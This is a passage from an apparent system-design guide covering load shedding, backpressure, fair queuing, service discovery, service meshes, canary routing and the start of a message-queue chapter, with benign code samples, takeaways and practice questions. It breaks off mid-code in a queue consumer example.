# Priority-aware shedding driven by observed system health.
CRITICALITY = {
"CRITICAL_PLUS": 0, # auth, payments -- shed only at total collapse
"CRITICAL": 1, # core user actions
"SHEDDABLE_PLUS":2, # recommendations, related items
"SHEDDABLE": 3, # analytics beacons, prefetch, background sync
}
def should_admit(request, queue_depth, max_queue, now):
# 1. Drop anything that can no longer be useful. Work on a request whose
# client has already given up is pure waste -- and it is worse than
# waste, because it consumes capacity a live request needed.
if request.deadline_ms and now > request.deadline_ms:
return False, "deadline_exceeded"
# 2. Shed by criticality as pressure rises: the fuller the queue, the
# higher up the priority ladder the cutoff climbs.
pressure = queue_depth / max_queue # 0.0 .. 1.0+
cutoff = 3 if pressure < 0.7 else (2 if pressure < 0.85 else
(1 if pressure < 0.95 else 0))
if CRITICALITY[request.criticality] > cutoff:
return False, "shed_by_priority"
# 3. Retries are shed before first attempts: the retry already consumed
# one chance, and admitting it now can sustain a retry storm.
if request.is_retry and pressure > 0.8:
return False, "shed_retry"
return True, "admitted"
Three implementation details separate shedding that helps from shedding that does not:
- Shed at the front, not the back. A request that has already done 90% of its work should be finished, not dropped. Reject at admission.
- Prefer LIFO under overload. Counter-intuitively, serving the newest request first is better when overloaded: the oldest queued requests are the ones most likely to have already timed out, so FIFO spends capacity on work nobody is waiting for any more.
- Make it observable. Shedding is a system deliberately failing requests. If the rate, reason, and criticality of shed requests are not on a dashboard, the next incident will be diagnosed as an unexplained error spike.
Key Takeaways
- Shedding trades a controlled partial failure for an uncontrolled total one; the metric that matters is goodput, not throughput.
- Without it, overload plus client retries produces metastable failure that outlives the original trigger.
- Shed by criticality, client class, deadline, and retry status — never at random.
- Drop at admission (cheap), consider LIFO queuing under overload, and instrument every shed decision.
🧪 Practice
- A service at 150% load has a client timeout of 2 s and an average queue wait of 5 s. Compute goodput with and without shedding one third of requests.
- Classify the endpoints of a system you know into the four criticality tiers above and justify the boundaries.
- Interview: Why does LIFO beat FIFO when a queue is overloaded, and why is it a bad default the rest of the time? (Hint: think about which request in the queue is most likely to still have a client waiting for it.)
Backpressure
Backpressure is the mechanism by which a slow consumer tells a fast producer to slow down. It is not a component you add; it is a property a pipeline either has or lacks, and the systems that lack it fail in a characteristic way — unbounded queue growth ending in memory exhaustion.
The reason it matters is that every pipeline has a mismatch somewhere. A service accepting 10,000 requests per second while its database handles 3,000 has three options for the excess: buffer it (memory grows until the process dies), drop it (shedding), or refuse to accept it in the first place (backpressure). Only the third both preserves the work and keeps the system stable, and it works by letting the slowness travel upstream to whoever can actually decide what to do.
The analogy is a factory conveyor belt. If the packing station is slower than the assembly line, you can pile boxes on the floor (unbounded queue), throw some away (shedding), or stop the line (backpressure). Stopping the line is the only option that neither loses product nor buries the building.
NO BACKPRESSURE WITH BACKPRESSURE
producer 10k/s producer 10k/s
| |
v [ bounded queue, 1k ]
[ unbounded queue ] <- grows | full -> producer BLOCKS
| forever | or is refused
v v
consumer 3k/s consumer 3k/s
Queue depth after 60s: 420,000 Queue depth: 1,000 (constant)
Memory: OOM kill Producer learns the true rate and
Latency: minutes (useless work) slows down / sheds at the SOURCE
The single most important design rule follows directly: every queue must be bounded. An unbounded queue does not prevent overload, it merely converts a fast, visible failure into a slow, catastrophic one — and along the way it inflates latency to the point where everything in the queue is stale.
// Node streams implement backpressure explicitly. This is what ignoring it
// looks like -- and it is one of the most common memory bugs in production.
readable.on('data', (chunk) => {
writable.write(chunk); // BUG: return value ignored. If the writer
}); // is slow, chunks buffer in memory forever.
// Correct: honour the signal. write() returns false when the buffer is full.
readable.on('data', (chunk) => {
const ok = writable.write(chunk);
if (!ok) {
readable.pause(); // stop reading upstream
writable.once('drain', () => readable.resume()); // resume when it clears
}
});
// Or let the runtime do it -- pipeline() propagates backpressure end to end.
const { pipeline } = require('stream/promises');
await pipeline(readable, transform, writable);
# A bounded queue turns "unbounded memory growth" into an explicit decision.
import asyncio
queue = asyncio.Queue(maxsize=1000) # THE bound: never omit this argument
async def producer(items):
for item in items:
try:
# Do not simply await put(): that gives unbounded LATENCY instead
# of unbounded memory. Bound the wait, then make a real decision.
await asyncio.wait_for(queue.put(item), timeout=0.5)
except asyncio.TimeoutError:
metrics.increment("producer.shed") # shed, or propagate 503
# upstream to the caller
Backpressure must propagate, not stop at one hop. If the database is slow, the service should slow down; if the service slows, the gateway should see it; if the gateway sees it, the client should be told. A pipeline where each stage buffers privately looks healthy at every layer until it collapses everywhere at once. The mechanisms differ by protocol but the intent is identical:
| Layer | Backpressure mechanism |
|---|---|
| TCP | Receive window shrinks; sender stalls |
| HTTP/2, gRPC | Per-stream and per-connection flow-control windows |
| Reactive streams | Consumer requests N items; producer may not exceed it |
| Message queues | Bounded queue depth; producer blocks or gets an error |
| Thread pools | Bounded work queue with a rejection policy |
| Connection pools | Bounded size with an acquisition timeout |
One anti-pattern deserves a specific warning: an unbounded thread pool or an
unbounded connection pool defeats backpressure completely. newCachedThreadPool
and a connection pool with no maximum both respond to overload by creating more
of the resource that is already scarce. Bound them, and give them a rejection
policy that fails fast.
Key Takeaways
- Backpressure is the consumer's slowness travelling back to the producer so the producer can slow or shed at the source.
- Every queue, pool, and buffer must be bounded — unbounded ones convert overload into memory exhaustion and useless stale work.
- Blocking forever on a full queue trades unbounded memory for unbounded latency; bound the wait and then decide.
- Backpressure must propagate across every hop, or the pipeline looks healthy right up until it collapses.
🧪 Practice
- A producer emits 5,000 msg/s, the consumer handles 2,000 msg/s, and each message is 2 KB. Compute the memory used after 10 minutes with an unbounded queue.
- Take a service you know and list every queue, pool, and buffer in its request path. Mark which are bounded.
- Interview: A gRPC streaming service OOMs under load even though CPU is at 30%. Where do you look? (Hint: what does the server do with messages it has received but not yet processed?)
Request Prioritization and Fair Queuing
Once a system can shed load, the next question is whose requests get served with the capacity that remains. A single FIFO queue answers "whoever arrived first," which is exactly wrong under contention: one client running a bulk job can fill the queue and starve every interactive user behind it.
Request prioritization classifies work by importance and serves higher classes first. Fair queuing ensures each client, tenant, or class receives a guaranteed share regardless of how much they ask for. They are complementary: priority decides which kind of work matters; fair queuing prevents any one source of that work from taking everything.
SINGLE FIFO QUEUE FAIR QUEUING (per-tenant)
[A A A A A A A A B C] tenant A: [A A A A A A] --\
| tenant B: [B] ---+--> round
one bulk client fills tenant C: [C] --/ robin
the queue; B and C wait
behind 8 of A's requests Each dequeue takes from a DIFFERENT
tenant, so B and C are served after
B's latency = 8 x service at most 2 other requests, no matter
how much A submits.
The most effective fair-queuing scheme in practice is weighted fair queuing with a virtual clock: each request is stamped with a virtual finish time that accounts for the tenant's weight and how much service they have already received, and the queue always serves the smallest stamp. It gives each tenant their configured share when everyone is busy, and lets any tenant use the whole system when others are idle — work-conserving fairness.
import heapq
from collections import defaultdict
class WeightedFairQueue:
"""Each tenant gets a share proportional to its weight when contended,
and may use spare capacity when others are idle."""
def __init__(self, weights):
self.weights = weights # tenant -> weight
self.virtual_time = 0.0
self.last_finish = defaultdict(float) # tenant -> its last stamp
self.heap = []
def submit(self, tenant, request, cost=1.0):
# A tenant that has been idle starts from the current virtual clock,
# so it is not punished for its past silence -- and one that has been
# greedy carries its accumulated finish time forward.
start = max(self.virtual_time, self.last_finish[tenant])
finish = start + cost / self.weights[tenant] # heavier weight ->
self.last_finish[tenant] = finish # smaller increment ->
heapq.heappush(self.heap, (finish, tenant, request)) # served sooner
def dequeue(self):
if not self.heap:
return None
finish, tenant, request = heapq.heappop(self.heap)
self.virtual_time = finish # clock advances with service
return tenant, request
q = WeightedFairQueue({"enterprise": 10, "free": 1})
for i in range(6):
q.submit("free", f"free-{i}") # free tier floods the queue
q.submit("enterprise", "ent-0") # one enterprise request arrives late
order = [q.dequeue()[0] for _ in range(4)]
print(order) # ['free', 'enterprise', 'free', 'free']
# -> the enterprise request jumps ahead of the free backlog
# without starving free entirely.
Strict priority queues (always serve class 0 before class 1) are simpler but introduce starvation: if high-priority work never stops arriving, low- priority work never runs. The usual remedies are a reserved minimum share for each class, or priority aging — increasing a request's priority the longer it waits.
| Scheme | Guarantees | Risk |
|---|---|---|
| FIFO | Arrival order | One noisy client starves others |
| Strict priority | High class always first | Starvation of low classes |
| Round robin per tenant | Equal share | Ignores request cost differences |
| Weighted fair queuing | Proportional share, work-conserving | More state and bookkeeping |
| LIFO (under overload) | Freshest work served | Unfair; only for overload |
Two supporting practices make prioritization work end to end. Propagate the priority — a criticality label attached at the edge should travel through every downstream call, or an internal service will happily spend its last capacity on a background job. And isolate the pools: give critical traffic its own connection pool and thread pool, so a flood of low-priority work cannot exhaust the resources critical work needs. That is the bulkhead pattern applied to queuing, and it is the difference between prioritization that works during an incident and prioritization that exists only on paper.
Key Takeaways
- FIFO under contention lets one heavy client starve everyone; fair queuing guarantees each source a share.
- Weighted fair queuing gives proportional shares when busy and full access to spare capacity when idle.
- Strict priority risks starvation; mitigate with reserved shares or priority aging.
- Propagate criticality across service boundaries and isolate pools per class, or the priority scheme stops at the first hop.
🧪 Practice
- Trace the weighted fair queue above with weights 10:1 and ten queued free requests plus three enterprise requests. What is the service order?
- Design the criticality labels for a food-delivery system and describe how they propagate from the mobile client to the payment service.
- Interview: A batch export job makes the interactive API slow even though CPU is at 40%. What is happening and what do you change? (Hint: something bounded and shared is fully occupied — and it is not the CPU.)
<a id="64-service-discovery-and-routing"></a>
6.4 Service Discovery and Routing
Scaling out produces a fleet whose membership changes constantly — instances start, stop, move, and get replaced on every deploy. Service discovery is how callers find the current members; routing is how the choice among them is made and changed deliberately.
Client-Side vs. Server-Side Discovery
In a static world you configure a service's address once. In an elastic world that address is a moving target: auto-scaling adds instances, deploys replace them, and container schedulers relocate them to different hosts and ports every few minutes. Something must answer "where is the payment service right now?"
There are two architectures for answering it, and the difference is who holds the list.
Server-side discovery puts a load balancer between caller and callee. The
caller knows one stable address — a DNS name pointing at the balancer — and the
balancer knows the live instances. This is the model behind every cloud load
balancer and Kubernetes Service.
Client-side discovery gives the caller the list. It queries a registry, caches the result, and picks an instance itself using whatever algorithm it likes. This is the model behind Netflix's Ribbon/Eureka, gRPC's built-in name resolvers, and every service mesh (where the "client" is a local sidecar).
SERVER-SIDE DISCOVERY CLIENT-SIDE DISCOVERY
caller caller
| | 1. "instances of payments?"
| one stable address v
v +------------+
[ load balancer ] <-- registers | registry |
| ^ +------------+
| | | 2. [10.0.1.4, 10.0.1.9, ...]
v | v
[ instances ] caller picks one itself
| 3. direct connection
+ Callers stay simple v
+ One place for policy [ instance ]
- An extra hop of latency
- The LB is a component to run + No extra hop; caller-side algorithms
- Discovery logic in every client
- Per-language libraries to maintain
The trade-off is concentration versus distribution. Server-side discovery keeps all the complexity in one component that every language and framework can use, at the price of one extra network hop and one more thing to operate. Client-side discovery removes the hop and enables sophisticated per-caller load balancing, at the price of embedding a discovery library into every service in every language you use — and of updating all of them when policy changes.
// Server-side: the caller knows nothing about instances.
// "payments" resolves to a stable virtual IP; the LB does the rest.
HttpResponse<String> response = client.send(
HttpRequest.newBuilder(URI.create("http://payments/charge")).build(),
BodyHandlers.ofString());
// Client-side: the caller resolves, caches, and chooses.
List<Instance> instances = registry.getHealthy("payments"); // cached locally,
// refreshed in bg
Instance target = loadBalancer.choose(instances); // any algorithm you like,
// e.g. zone-aware + EWMA
HttpResponse<String> response = client.send(
HttpRequest.newBuilder(URI.create("http://" + target.hostPort() + "/charge"))
.build(),
BodyHandlers.ofString());
// The caller must also handle: stale cache entries, registry unavailability
// (keep serving the last known good list), and ejecting failing instances.
| Aspect | Server-side | Client-side |
|---|---|---|
| Where the list lives | Load balancer | Every caller |
| Network hops | Two (caller -> LB -> target) | One (caller -> target) |
| Language coupling | None | A library per language |
| Load-balancing choice | Whatever the LB supports | Anything the client implements |
| Policy change rollout | Update the LB | Redeploy every caller |
| Failure of the mediator | LB down = service unreachable | Registry down = use cached list |
The service mesh, covered later in this subchapter, is the design that refuses the trade-off: it uses client-side discovery for the routing benefits, but puts the logic in a sidecar proxy rather than in the application, so there is exactly one implementation regardless of language.
Key Takeaways
- Discovery exists because instance addresses change constantly in an elastic system.
- Server-side discovery hides everything behind one address: simple callers, one extra hop, a component to operate.
- Client-side discovery removes the hop and enables smarter balancing, at the cost of a library in every language.
- A registry outage should degrade to the last known good list, never to a hard failure.
🧪 Practice
- List the failure modes introduced by each model and how each degrades when its mediator (LB or registry) is unavailable.
- Your fleet uses Java, Go, and Python. Argue for one model and state what it costs you.
- Interview: Why does client-side discovery make zone-aware routing easier? (Hint: who knows which zone the caller is in?)
Service Registries
A service registry is the database of "what is running where." It holds an entry per instance — service name, address, port, health status, and metadata like version or zone — and every discovery mechanism ultimately reads from one.
The interesting design questions are not about storing the data but about keeping it true. A registry that lists dead instances is worse than no registry at all, because callers will confidently route to nothing.
Registration happens one of two ways. Self-registration has the instance announce itself on startup and renew a lease periodically; simple, but couples application code to the registry and leaves stale entries when an instance dies without deregistering. Third-party registration has a separate agent — the container orchestrator, typically — register instances based on observed state; this is what Kubernetes does, and it is why nothing in a Kubernetes pod needs registry code.
Freshness is maintained by one of two mechanisms, and the difference determines how fast failures are noticed:
| Mechanism | How it works | Stale window |
|---|---|---|
| Heartbeat / TTL lease | Instance renews every N seconds or is evicted | Up to the TTL |
| Active health check | Registry (or agent) probes instances | Interval x failure threshold |
REGISTRY LIFECYCLE
1. START instance boots, passes its own startup checks
2. REGISTER PUT /v1/register {name, ip, port, zone, version}
3. RENEW lease renewed every 10s (TTL 30s) -- three chances to miss
4. DISCOVER callers/LBs watch the registry and update their view
5. DRAIN SIGTERM -> deregister FIRST, then finish in-flight work
6. EXPIRE if the process dies hard, the lease expires and the entry
is evicted after the TTL -- this is the safety net that
makes step 5 an optimization rather than a requirement
# Self-registration with a lease. Note the two independent safety mechanisms.
import threading, atexit, signal
class RegistryClient:
def __init__(self, registry, service, addr, ttl=30, renew_every=10):
self.registry, self.service, self.addr = registry, service, addr
self.ttl, self.renew_every = ttl, renew_every
self.instance_id = f"{service}-{addr}"
def start(self):
self.registry.register(self.instance_id, self.service, self.addr,
ttl=self.ttl, meta={"version": VERSION,
"zone": ZONE})
# Renew at 1/3 of the TTL: two consecutive renewals may fail without
# the instance being evicted. Renewing at the TTL itself would make
# a single dropped packet look like a dead instance.
self._timer()
atexit.register(self.stop) # graceful path
signal.signal(signal.SIGTERM, lambda *_: self.stop())
def _timer(self):
self.registry.renew(self.instance_id, ttl=self.ttl)
t = threading.Timer(self.renew_every, self._timer)
t.daemon = True
t.start()
def stop(self):
# Deregister explicitly so callers stop routing here immediately
# instead of waiting out the TTL. The TTL remains the backstop for
# a hard crash, where this code never runs at all.
self.registry.deregister(self.instance_id)
The hardest property to get right is behaviour during a network partition. A registry that insists on strong consistency (etcd, Consul, ZooKeeper — all Raft-based) will refuse writes when it loses quorum, meaning instances cannot register during exactly the incident when you most need capacity to come online. Eureka takes the opposite position with self-preservation mode: when it sees a mass loss of heartbeats, it assumes the network is broken rather than that every instance died, and it stops evicting entries.
| Registry | Consistency | Health model | Notable property |
|---|---|---|---|
| etcd | Strong (Raft) | TTL leases + watches | Backs Kubernetes; refuses writes without quorum |
| Consul | Strong (Raft) | Agent-run checks | Rich health checks, multi-datacenter |
| ZooKeeper | Strong (ZAB) | Ephemeral znodes | Entry vanishes when the session drops |
| Eureka | AP, eventual | Client heartbeats | Self-preservation prefers stale over empty |
The underlying principle generalizes beyond registries: for a discovery system, availability usually beats consistency. Routing to an instance that died two seconds ago costs one failed request and a retry. Being unable to resolve any address at all takes the entire system down.
Key Takeaways
- A registry maps service names to live instances with health state and metadata; its hard problem is staleness, not storage.
- Renew leases well inside the TTL so transient packet loss does not evict a healthy instance.
- Deregister on shutdown for speed and rely on TTL expiry as the crash backstop.
- Prefer availability over consistency for discovery: a slightly stale list beats an empty one.
🧪 Practice
- With a 30-second TTL renewed every 10 seconds, how long can a hard-crashed instance keep receiving traffic? How would you reduce it, and what breaks if you go too far?
- Explain what self-preservation mode prevents, and construct a scenario where it makes an incident worse.
- Interview: Your registry is a Raft cluster that loses quorum during an AZ outage. What happens to running traffic, and to a scale-out? (Hint: reads from a cached list and writes to the registry have very different fates.)
DNS-Based Discovery
DNS is the oldest service discovery system, and it is still the most widely deployed one — every language can resolve a hostname with no library, no sidecar, and no code change. Using DNS for discovery means putting instance addresses into DNS records and letting normal resolution find them.
Three record types do the work:
- A / AAAA records map a name to one or more IP addresses. Multiple records give crude round robin: resolvers typically rotate the order.
- SRV records map a name to host and port, plus priority and weight — which matters when instances land on random ports, as they do under most container schedulers.
- CNAME aliases one name to another, used for regional or blue/green indirection.
DNS RECORDS FOR DISCOVERY
payments.internal. 30 IN A 10.0.1.4
payments.internal. 30 IN A 10.0.1.9 <- multiple A records,
payments.internal. 30 IN A 10.0.2.7 resolver rotates
_grpc._tcp.payments. 30 IN SRV 10 60 50051 pay-a.internal.
_grpc._tcp.payments. 30 IN SRV 10 40 50052 pay-b.internal.
^ ^ ^ ^
| | | target host
| | port (dynamic!)
| weight (60/40 split)
priority (lower wins first)
DNS's appeal is universality, and its weakness is that it was designed for records that change rarely. Four problems follow, and you must plan for all of them.
Caching you do not control. A TTL is a hint. OS resolvers, language runtimes, and connection pools all cache, sometimes ignoring the TTL entirely. The infamous case is the JVM, which historically cached successful lookups forever by default:
// Without this, a long-running JVM may keep using an IP that was retired
// hours ago. networkaddress.cache.ttl is a JVM-wide security property.
java.security.Security.setProperty("networkaddress.cache.ttl", "30");
java.security.Security.setProperty("networkaddress.cache.negative.ttl", "5");
No health awareness by default. A plain A record does not know its target is down. Health-aware DNS exists (Route 53 health checks, Consul DNS), but the removal still only takes effect as records expire from caches.
No load awareness. Resolver rotation is not load balancing; it cannot see that one instance is saturated.
Response size limits. A UDP DNS response is practically limited to about 512 bytes without EDNS0, which caps how many instances fit in one answer — a real constraint for fleets of hundreds.
# What a DNS-discovering client must do that a registry client gets for free.
import socket, time, random
class DnsDiscovery:
def __init__(self, name, refresh=30):
self.name, self.refresh = name, refresh
self.addrs, self.fetched_at = [], 0.0
self.ejected = {} # addr -> retry-after timestamp
def resolve(self):
# Re-resolve on OUR schedule rather than trusting the platform to
# honour the TTL. Long-lived connection pools otherwise pin to IPs
# that were retired long ago.
if time.monotonic() - self.fetched_at > self.refresh:
infos = socket.getaddrinfo(self.name, None, proto=socket.IPPROTO_TCP)
self.addrs = list({i[4][0] for i in infos})
self.fetched_at = time.monotonic()
now = time.monotonic()
live = [a for a in self.addrs if self.ejected.get(a, 0) < now]
return live or self.addrs # never return an empty list:
# better to try a suspect host
# than to fail with no target
def eject(self, addr, seconds=30):
# Passive health checking, because DNS will not tell us about failures.
self.ejected[addr] = time.monotonic() + seconds
The correct way to think about DNS is as a bootstrap and coarse-grained
routing mechanism, not a fine-grained load balancer. Use it to find the
regional entry point or the stable service address; use a registry, a load
balancer, or a mesh for instance-level decisions that must react in seconds.
This is exactly the layering Kubernetes uses: DNS resolves payments to a
stable virtual IP, and the actual instance selection happens below it in
kube-proxy or the mesh.
Key Takeaways
- DNS discovery is universal and needs no client library; SRV records add ports and weights for dynamic environments.
- TTLs are advisory — OS, runtime, and pool caches routinely outlive them, so re-resolve on your own schedule.
- DNS is neither health-aware nor load-aware by default, and UDP response size limits the number of instances per answer.
- Use DNS for coarse routing and bootstrap; use a registry or mesh for instance-level decisions.
🧪 Practice
- Explain why lowering a TTL to 5 seconds does not guarantee 5-second failover, and name three caches involved.
- Write the SRV records for a service with two instances split 70/30 across dynamic ports.
- Interview: A service keeps sending traffic to a terminated instance an hour after it was removed from DNS. What do you check first? (Hint: what does a long-lived connection pool do after its first successful resolution?)
Service Mesh and Sidecar Proxies
A service mesh moves discovery, load balancing, retries, timeouts, mutual TLS,
and telemetry out of application code and into a proxy deployed next to every
instance. The application talks to localhost; the proxy handles everything
that used to require a library.
The motivation is a duplication problem. In a polyglot fleet, every cross- cutting concern — retry policy, circuit breaking, tracing headers, mTLS — must be implemented in every language, kept consistent, and upgraded everywhere at once. That upgrade is the killer: changing a retry policy across forty services in five languages is a quarter-long project. A mesh makes it a configuration push.
SIDECAR TOPOLOGY
+---------------------------+ +---------------------------+
| pod: orders | | pod: payments |
| +---------+ +--------+ | mTLS | +--------+ +---------+ |
| | app |->| proxy |--|--------|->| proxy |->| app | |
| +---------+ +--------+ | | +--------+ +---------+ |
+--------|------------------+ +--------|------------------+
| DATA PLANE (Envoy sidecars) |
+------------------+-----------------+
| xDS config + telemetry
+--------------------+
| CONTROL PLANE | Istio / Linkerd
| policy, certs, |
| service registry |
+--------------------+
The app makes a plain HTTP call to localhost. The proxy adds: discovery,
load balancing, retries, timeouts, circuit breaking, mTLS, and metrics.
The split between data plane (the proxies, on the request path) and control plane (configuration, certificates, policy — off the request path) is the architecture's central idea. Traffic keeps flowing when the control plane is down, because proxies run on their last-known configuration.
# Istio: retries, timeouts, and outlier ejection as CONFIGURATION.
# None of this exists in the application's source code.
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata: { name: payments }
spec:
hosts: [payments]
http:
- timeout: 3s # end-to-end budget for the whole call
retries:
attempts: 3
perTryTimeout: 800ms # 3 x 800ms < 3s, so retries fit the budget
retryOn: 5xx,reset,connect-failure
# NOTE: no retry on 4xx -- retrying a
# client error just wastes capacity
route:
- destination: { host: payments, subset: v1 }
---
apiVersion: networking.istio.io/v1beta1
kind: DestinationRule
metadata: { name: payments }
spec:
host: payments
trafficPolicy:
connectionPool:
http: { http2MaxRequests: 100, maxRequestsPerConnection: 10 }
outlierDetection: # passive health checking
consecutive5xxErrors: 5
interval: 10s
baseEjectionTime: 30s
maxEjectionPercent: 50 # CRITICAL: never eject more than half,
# or a bad deploy empties the whole pool
What you get, and what it costs:
| Gain | Cost |
|---|---|
| Uniform policy across all languages | One extra proxy hop each way (~0.5-2 ms p99) |
| mTLS everywhere with automatic rotation | 50-150 MB memory and some CPU per pod |
| Consistent golden metrics for free | A complex control plane to operate and upgrade |
| Traffic splitting without code changes | Debugging now spans app and proxy layers |
| Retries and circuit breaking as config | A new class of failure: proxy misconfiguration |
That maxEjectionPercent line is worth dwelling on, because it encodes a
general lesson about automated ejection: if a bad deploy makes every instance
return 5xx, unrestricted outlier detection will eject the entire pool and turn a
degraded service into a dead one. Every automatic removal mechanism needs a
floor.
A mesh is justified when you have many services in multiple languages and need uniform security and policy. It is over-engineering for a handful of services in one language, where a good client library gives you most of the benefit for a fraction of the operational cost. Newer designs reduce the overhead by moving L4 concerns into a per-node component and keeping a sidecar only where L7 features are actually needed.
Key Takeaways
- A mesh moves discovery, retries, timeouts, mTLS, and telemetry into a sidecar proxy so every language gets identical behaviour.
- Data plane (proxies) stays on the request path; control plane (config, certs) does not, so traffic survives a control-plane outage.
- The cost is real: an extra hop, per-pod resources, and a complex control plane to operate.
- Cap automatic ejection — unbounded outlier detection turns a bad deploy into a total outage.
🧪 Practice
- Compute the added latency for a request that traverses four services in a mesh, at 1 ms per proxy hop.
- Rewrite the retry policy above for an endpoint that is not idempotent, and explain each change.
- Interview: A team wants a mesh for eight Go services in one cluster. What do you ask before agreeing? (Hint: which of the mesh's benefits do they not already get from one shared client library?)
Traffic Splitting and Canary Routing
Traffic splitting is the ability to send a controlled percentage of requests to a different version of a service. It is the mechanism behind canary releases, blue/green deployments, and A/B tests — and it is what turns a deployment from an all-or-nothing event into a measured, reversible experiment.
The reason it matters is that testing environments never fully reproduce production: real traffic patterns, real data distributions, real client versions, real concurrency. A canary release accepts this by exposing the new version to a small fraction of real traffic and watching the metrics that matter, so a bad release harms 1% of requests for five minutes rather than 100% of requests until someone notices.
CANARY PROGRESSION
t0 v1: 100% v2: 0% deploy v2, no traffic, verify it starts
t1 v1: 99% v2: 1% watch: error rate, p99 latency, business metrics
t2 v1: 95% v2: 5% still healthy after a full metric window
t3 v1: 75% v2: 25%
t4 v1: 0% v2: 100% promote; keep v1 ready to receive traffic again
At ANY step, an automated check that fails sends the split back to 0%.
Rollback is a routing change -- seconds -- not a redeploy.
The comparison with the neighbouring strategies:
| Strategy | Traffic to new version | Rollback speed | Extra capacity needed |
|---|---|---|---|
| Rolling | Grows as instances swap | A full rolling back | Small |
| Blue/green | 0% then 100% at once | Instant (flip back) | 2x during the switch |
| Canary | Small, increasing | Instant (set to 0%) | Small |
| Shadow/mirror | 0% (a copy is sent) | Not applicable | 1x for the shadow |
# Weighted split at the routing layer, independent of instance counts.
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata: { name: checkout }
spec:
hosts: [checkout]
http:
# Rule order matters: the first match wins, so targeted rules go first.
- match:
- headers:
x-canary: { exact: "true" } # internal testers opt in
route:
- destination: { host: checkout, subset: v2 }
- route: # everyone else: weighted split
- destination: { host: checkout, subset: v1 }
weight: 95
- destination: { host: checkout, subset: v2 }
weight: 5
mirror: { host: checkout, subset: v3 } # v3 receives a COPY of traffic;
mirrorPercentage: { value: 10 } # its responses are DISCARDED
Two details decide whether a canary is meaningful.
Sticky assignment. Randomizing per request means one user's session bounces between versions, which produces incoherent behaviour and makes results unreadable. Hash a stable identifier so a given user consistently sees one version.
import hashlib
def variant_for(user_id, canary_percent):
"""Stable assignment: the same user always lands on the same version,
and raising the percentage only ever ADDS users to the canary."""
h = int(hashlib.sha256(f"checkout:{user_id}".encode()).hexdigest()[:8], 16)
return "v2" if (h % 100) < canary_percent else "v1"
# Including the experiment name in the hash prevents correlated assignment:
# without it, the same users would be canaried for every experiment forever.
Automated analysis. A canary that a human watches is a canary that gets promoted on a Friday afternoon because the dashboard "looked fine." Define the comparison up front, and let a controller promote or roll back on it.
# Argo Rollouts: the promotion criteria are code, evaluated automatically.
analysis:
metrics:
- name: error-rate
interval: 1m
successCondition: result < 0.01 # absolute floor
failureLimit: 2 # two bad windows -> roll back
- name: p99-latency-vs-baseline
successCondition: result < 1.2 # no worse than 1.2x the stable
- name: checkout-completion-rate # the business metric: a release
successCondition: result >= 0.98 # can be fast, healthy, AND wrong
That last metric is the one teams forget. A new version can have a lower error rate and better latency while quietly failing to complete purchases — a technically healthy release that is a business outage. Canary analysis must include at least one metric that measures whether users are still succeeding at what they came to do.
Finally, note the constraint that traffic splitting cannot solve on its own: both versions run simultaneously against the same data. A schema change, a cache format change, or a message format change must therefore be forward-and-backward compatible for the duration of the rollout. The routing layer makes the code rollback instant; it does nothing for data you have already written in the new format.
Key Takeaways
- Traffic splitting exposes a new version to a controlled fraction of real traffic, making rollback a routing change measured in seconds.
- Assign variants by hashing a stable user identifier so behaviour is coherent and results are readable.
- Automate promotion and rollback against explicit thresholds, including at least one business metric.
- During any split, both versions share the data layer — schema and message changes must be compatible in both directions.
🧪 Practice
- Design a canary schedule for a service handling 100k rps, with the shortest step long enough to detect a 0.5% error-rate regression.
- Explain why mirrored traffic must not perform writes, and describe what you would change to make a write path safely mirrorable.
- Interview: A canary shows lower latency and fewer errors than the stable version, but revenue drops during the window. What happened, and what should the canary analysis have included? (Hint: an endpoint that returns 200 has not necessarily done anything useful.)
<a id="7-asynchronous-processing-and-messaging"></a>
7. Asynchronous Processing and Messaging
Asynchronous processing decouples the moment work is requested from the moment it is done, which is how systems absorb spikes, survive downstream failures, and keep user-facing latency low while heavy work happens elsewhere. This chapter covers the two families of messaging infrastructure — queues and logs — the delivery guarantees they can and cannot offer, and the patterns for running the background work they feed.
<a id="71-message-queues"></a>
7.1 Message Queues
A message queue is a durable buffer between a component that produces work and a component that performs it. Everything else in this subchapter follows from that one structural change: the two sides no longer have to be available, fast, or even alive at the same time.
Producer-Consumer Model
The producer-consumer model is the foundation of all asynchronous messaging. A producer creates a message describing work to be done and hands it to a broker. A consumer takes messages from the broker and does the work. Neither knows anything about the other — not its address, its availability, or how many of it there are.
The reason to introduce a broker between them is that a direct synchronous call couples the caller to the callee in four ways at once, and every one of those couplings is a failure mode:
| Coupling | Synchronous call | With a queue |
|---|---|---|
| Temporal | Both must be up at the same instant | Consumer can be down; work waits |
| Capacity | Caller runs at the callee's speed | Queue absorbs the difference |
| Location | Caller needs the callee's address | Both only know the broker |
| Failure | Callee's failure becomes the caller's | Failure is retried, not propagated |
Consider a user uploading a video. Synchronously, the HTTP request must wait for
transcoding to finish — perhaps four minutes, holding a connection, a thread,
and the user's attention, and failing entirely if the transcoder is restarting.
Asynchronously, the API writes one message and returns 202 Accepted in 20
milliseconds; the transcoder picks the job up whenever it is ready.
The analogy is a restaurant's ticket rail. Waiters clip orders to the rail and walk away; cooks pull tickets when they finish the previous dish. Nobody waits for anybody. A rush of customers makes the rail longer, not the waiters slower, and a cook stepping away for two minutes costs throughput, not orders.
SYNCHRONOUS ASYNCHRONOUS
client client
| POST /videos | POST /videos
v v
[ API ] ---- blocks 4 min ----+ [ API ] --> 202 Accepted (20 ms)
| | |
v | v enqueue
[ transcoder ] | [ QUEUE ] <- absorbs bursts, survives
| | | consumer restarts
v | v dequeue
done -----------------------> | [ transcoder x N ]
|
Transcoder down = request fails v
Traffic spike = timeouts done -> notify via callback/websocket
Transcoder down = queue grows
Traffic spike = queue grows
# Producer: the API's only job is to record intent and return.
import json, uuid
def request_transcode(video_id, formats):
message = {
"job_id": str(uuid.uuid4()), # a stable identity for dedup and tracing
"video_id": video_id,
"formats": formats,
"requested_at": time.time(),
}
channel.basic_publish(
exchange="",
routing_key="transcode",
body=json.dumps(message),
properties=pika.BasicProperties(
delivery_mode=2, # persist to disk: survives a broker restart
message_id=message["job_id"],
),
)
return {"status": "accepted", "job_id": message["job_id"]} # 202, not 200
# Consumer: pulls work, does it, and only then acknowledges.
def on_message(ch, method, properties, body):
job = json.loads(body)
try:
transcode(job["video_id"], job["formats"])
ch.basic_ack(delivery_tag=method.delivery_tag) # done: remove it
except TransientError:
ch.basic_nack(delivery_tag=method.delivery_tag, requeue=True) # retry
except PermanentError:
